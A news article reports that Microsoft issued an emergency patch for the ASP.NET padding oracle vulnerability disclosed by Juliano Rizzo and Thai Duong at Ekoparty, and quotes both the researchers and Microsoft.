Microsoft has released the emergency out-of-band patch for the ASP.NET padding oracle attack, less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina.
The patch for the ASP.NET bug is only available through Microsoft’s Download Center right now, but the company plans to push it out over Windows Update and Windows Server Update within a few days, as well.
“For customers who use Automatic Updates, the update will be
automatically applied once it is released broadly. Once the Security
Update is applied, customers are protected against known attacks related
to Security Advisory 2416728,” said Dave Forstrom, director of Trustworthy Computing at Microsoft.
The company will hold a live webcast at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release.
The ASP.NET vulnerability first game to light on Sept. 13 when the researchers who discovered the vulnerability, Juliano Rizzo and Thai Duong, discussed the bug and their technique for exploiting it. The attack itself is an implementation of an existing technique developed several years ago to exploit weaknesses in crypto implementations.
“We knew ASP.NET was vulnerable to our attack several months ago, but we
didn’t know how serious it is until a couple of weeks ago. It turns out
that the vulnerability in ASP.NET is the most critical amongst other
frameworks. In short, it totally destroys ASP.NET security,” said Duong, when discussing the attack. “It’s worth noting that the attack is 100% reliable, i.e. one can be
sure that once they run the attack, they can exploit the target. It’s
just a matter of time. If the attacker is lucky, then he can own any
ASP.NET website in seconds. The average time for the attack to complete
is 30 minutes. The longest time it ever takes is less than 50 minutes.”
Last week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don’t protect against the attack, just one version of it.
Microsoft didn’t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch. On Aug. 2, the company issued an out-of-band patch for the original bug that was identified as part of the Stuxnet malware attack.